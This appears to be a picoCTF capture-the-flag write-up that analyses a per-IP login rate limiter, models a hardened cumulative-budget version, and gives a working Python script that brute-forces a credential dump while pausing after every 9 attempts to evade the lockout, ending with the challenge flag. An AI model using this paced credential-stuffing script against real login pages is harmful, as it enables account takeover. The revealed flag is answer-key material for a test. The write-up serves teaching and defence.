Solution
Download the challenge's source code.
Inspect the code to locate the lockout logic.
flowchart LR
A([🔵 Request received]) --> B
B["📡 Get client IP
───────────────
request.remote_addr"]
B --> C["🗄️ Refresh database
───────────────
refresh_request_rates_db(ip)"]
C --> D{IP already in DB?}
D --❌ No--> E["🆕 Create new record
───────────────
num_requests = 0
epoch_start = -1
lockout_until = -1"]
E --> F
D --✅ Yes--> F
F{POST request?}
F --❌ No--> I
F --✅ Yes--> H["➕ Accumulate failure count
───────────────
num_requests += 1
start the clock if epoch = -1"]
H --> I
I{num_requests > MAX_REQUESTS?}
I --❌ No--> J([✅ return False\nallow request])
I --✅ Yes--> K{lockout_until == -1?}
K --✅ Yes, first time over the limit--> L["🔒 Set lockout time
───────────────
lockout_until =
curr_time + 120 s"]
L --> M
K --❌ No, already locked--> M
M([🚫 return True\nreject request])
style A fill:#4A90D9,stroke:#2C5F8A,color:#fff
style J fill:#27AE60,stroke:#1A7A42,color:#fff
style M fill:#E74C3C,stroke:#A93226,color:#fff
style E fill:#F0F4FF,stroke:#7B9ED9,color:#2C3E50
style H fill:#FFF8E7,stroke:#F0A500,color:#7A5000
style L fill:#FFE8E8,stroke:#E74C3C,color:#8B0000
style B fill:#EAF4FB,stroke:#7FB3D3,color:#1A5276
style C fill:#EAF4FB,stroke:#7FB3D3,color:#1A5276

Note:
client_ip = request.remote_addr reads the real peer address directly, so X-Forwarded-For or X-Real-IP headers cannot be used to change the IP the limiter sees.
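The weakness in the flow above, as an added example that is not code from the challenge: a Python model of the limiter as drawn, beside a hardened variant that also keeps a never-cleared per-source attempt budget. MAX_REQUESTS = 9, the 30-second window and the refresh semantics are assumptions inferred from the 9-attempts-then-wait pacing used later in this write-up, not values shown on the page; the client IP and timings are constructed.

```python
# Added example, not the challenge's own code: the limiter from the flowchart
# beside a hardened variant. Assumed (not on the page): MAX_REQUESTS = 9, a
# 30 s window matching the 9-then-wait pacing, refresh drops expired records.
MAX_REQUESTS, WINDOW, LOCKOUT = 9, 30, 120  # first two are assumptions
class WindowLimiter:
    """Per-IP limiter as drawn (every call is a login POST): the counter is
    cleared when the window ends, so attempts never add up across windows."""
    def __init__(self):
        self.db = {}
    def _refresh(self, ip, now):  # models refresh_request_rates_db(ip)
        rec = self.db.get(ip)
        if rec and ((rec["lockout_until"] != -1 and now >= rec["lockout_until"]) or
                    (rec["lockout_until"] == -1 and rec["epoch_start"] != -1
                     and now - rec["epoch_start"] >= WINDOW)):
            del self.db[ip]  # window or lockout expired: record dropped
    def is_blocked(self, ip, now):
        self._refresh(ip, now)
        rec = self.db.setdefault(ip, {"num_requests": 0, "epoch_start": -1, "lockout_until": -1})
        rec["num_requests"] += 1
        if rec["epoch_start"] == -1:
            rec["epoch_start"] = now  # start timing on the first POST
        if rec["num_requests"] > MAX_REQUESTS:
            if rec["lockout_until"] == -1:  # first time over the limit
                rec["lockout_until"] = now + LOCKOUT
            return True
        return False

class CumulativeLimiter(WindowLimiter):
    """Hardened: a never-cleared per-IP attempt budget on top of the window."""
    def __init__(self, budget=20):
        super().__init__()
        self.total, self.budget = {}, budget
    def is_blocked(self, ip, now):
        if super().is_blocked(ip, now):
            return True
        self.total[ip] = self.total.get(ip, 0) + 1
        return self.total[ip] > self.budget

def paced_attempts(limiter, total, burst=9, gap=30):
    """Replay bursts of `burst` requests with `gap` idle seconds between them;
    return how many got through before the first block."""
    now, allowed = 0, 0
    for i in range(total):
        if i and i % burst == 0:
            now += gap
        if limiter.is_blocked("198.51.100.7", now):  # constructed client IP
            return allowed
        allowed, now = allowed + 1, now + 1  # one request per second
    return allowed
```

With the window-only limiter, bursts of 9 with a 30-second pause never trigger the lockout; the cumulative budget blocks the same pacing once the total exceeds it.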
Check the format of the password dictionary provided with the challenge.
Check the format of the login request packet.
Write a script with Python's requests module that tries each login automatically and pauses for 30 seconds after every 9th attempt (35 seconds to be safe) so the lockout is never triggered.
import time
import requests

# Load the credential list; each line is "username;password".
username = []
password = []
with open("creds-dump.txt", "r") as f:
    for line in f.readlines():
        parts = line.strip().split(';')
        username.append(parts[0])
        password.append(parts[1])

url = "http://candy-mountain.picoctf.net:61238/login"
headers = {
    # Content-Length is omitted on purpose: requests computes it from the body.
    "Cache-Control": "max-age=0",
    "Accept-Language": "zh-TW,zh;q=0.9",
    "Origin": "http://candy-mountain.picoctf.net:61238",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://candy-mountain.picoctf.net:61238/login",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}

for i in range(0, len(username)):
    # The limiter counts POSTs per window, so pause after every 9 attempts.
    if i % 9 == 0 and i != 0:
        print("Run 9 Sleep for 35 seconds to avoid rate limit...")
        time.sleep(35)
    data = {
        "username": username[i],
        "password": password[i],
    }
    r = requests.post(url, data=data, headers=headers)
    # Any response without the error message means the login succeeded.
    if '<p class="error-message">Invalid username or password.</p>' not in r.text:
        print("Trying username: " + username[i] + " password: " + password[i] + " success!!")
        print(r.text)
        break
    print("Trying username: " + username[i] + " password: " + password[i] + " error!!")
Run the script to obtain the correct password.
Log in with the correct password.
Get the flag.

picoCTF{f00l_7h4t_l1m1t3r_b9fcf635}
Submit the flag.